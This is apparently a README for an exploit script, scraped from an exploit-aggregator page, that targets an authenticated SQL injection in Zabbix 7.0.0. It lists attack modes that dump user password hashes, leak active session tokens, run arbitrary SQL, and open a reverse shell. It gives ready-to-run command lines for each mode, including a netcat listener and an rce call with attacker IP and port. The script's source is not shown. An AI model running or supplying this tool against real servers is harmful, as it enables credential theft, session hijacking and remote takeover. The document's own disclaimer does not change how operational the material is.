Share
## https://sploitus.com/exploit?id=285C1AC6-89F8-5698-9A39-0738786ADA57
# ๐ก๏ธ Zabbix 7.0.0 SQL Injection Exploit Script
A Python script to exploit a **Zabbix 7.0.0** authenticated SQL injection vulnerability, supporting multiple modes of action including user data extraction, session token leaks, remote command execution (RCE), and custom query injection.
> โ ๏ธ **DISCLAIMER:**
> This script is for **educational** and **authorized penetration testing** purposes only.
> Do **not** use it on systems you do not own or have explicit permission to test.
> The author is not responsible for any misuse or damage caused by this tool.
---
## โจ Features
- โ
Authenticated SQL Injection against Zabbix 7.0.0
- ๐งโ๐ป Dump user hashes from the DB
- ๐ Leak session tokens
- ๐ Remote code execution via reverse shell (admin token required)
- ๐ง Run custom SQL queries
---
## ๐ง Requirements
- Python 3.6+
- `requests` library
Install requirements if needed:
```bash
pip install requests
```
## ๐ Usage
```bash
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
```
## ๐ Available Modes
| Mode | Description | Requires Admin Token |
| ------------ | ------------ | ------------ |
| leak-users | Dumps all user IDs, usernames, password hashes, and roles | โ |
| leak-tokens | Dumps all active session IDs from the database | โ |
| rce | Spawns a reverse shell via item.create exploit | โ
|
| custom | Run any custom SQL query via the injection | โ |
## ๐งช Examples
Dump User Hashes
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
```
Leak Session Tokens
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
```
Remote Code Execution (Reverse Shell)
```bash
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
```
Custom SQL Injection
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
```
## ๐ Project Structure
```bash
sqliZabbix.py # Main exploit script
README.md # This documentation
```
## ๐งโ๐ป Author
Anthony (@874anthony)
Crafted with love & curiosity ๐
## ๐ License
This project is released under the MIT License. Please use responsibly.